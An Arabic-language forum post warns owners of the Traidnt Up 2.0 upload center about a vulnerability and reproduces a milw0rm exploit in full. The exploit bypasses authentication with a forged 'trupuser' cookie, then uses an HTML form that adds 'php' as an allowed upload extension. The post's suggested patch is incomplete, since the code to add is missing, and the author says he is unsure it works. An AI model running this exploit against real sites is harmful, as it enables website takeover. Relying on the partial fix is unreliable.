[ تحذير ] للجميع .. ثغرة في مركز تحميل ترايدنت الإصدار الثاني .. خطيرة جداً جداً
السلام عليكم ورحمة الله وبركاته
بالأمس أكتشف ثغرة في مركز تحميل ترايدنت الإصدار الثاني
والثغرة خطيرة جداً كافيه بإختراق الموقع بكل سهوله
الثغرة نزلت في الميلوورم ..
كود PHP:
<html>
<center>
<br>
<br>
<!--
#########################################################
#
# Traidnt Up version 2.0 Add Extension By Pass
# Author: SP4rT
# Email : SP4rt@Yahoo.coM
# DownLoad : http://traidnt.net/vb/showthread.php?t=943260
# Downloads : 33712
#
# 1. Enter uploadcp url
# 2. javascript :documentcookie="trupuser=SP4rT;";
# 3. Enter this Page After Edit {script_path} & PosT your Extension .
#
#########################################################
-->
<form name='traidnt-ext' action='http:/{script_path}/uploadcp/files.php?do=extension&go=add' method='POST'>
<table border='1' width='450'>
<tr>
<td align='center' colspan='2'>Add Extension :</td>
</tr>
<tr>
<td align=center><input type='text' name='exname' value='php'>
<input type='hidden' name='maxsize' value='1000000000000'>
<input type='submit' value=' Add Ext '>
</td>
</tr>
</table>
# milw0rm.com [2009-03-11]
المصدر // http://www.milw0rm.com/exploits/8202
الترقيع الموجود .. ولست متأكداً منه كالتالي > قم بتحرير ملف uploadcp/adminquery.php :
ابحث عن :
كود PHP:
echo "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"2; url=login.php\">";
اضف بعده مباشرة :
ننتظر الخبراء .. رغم إني تأكدت من عمل الثغرة والثغرة خطيرة جداً . ..
لمصلحة الجميع لمن مركب مركز ترايدنت إيقافه هذه الفترة ..
وتحياتي ..
أخوكم عبدالله ..
__________________
لا تسقني كأس الحياة بذلةٍ .... بل فاسقني بالعز كأس الحنظل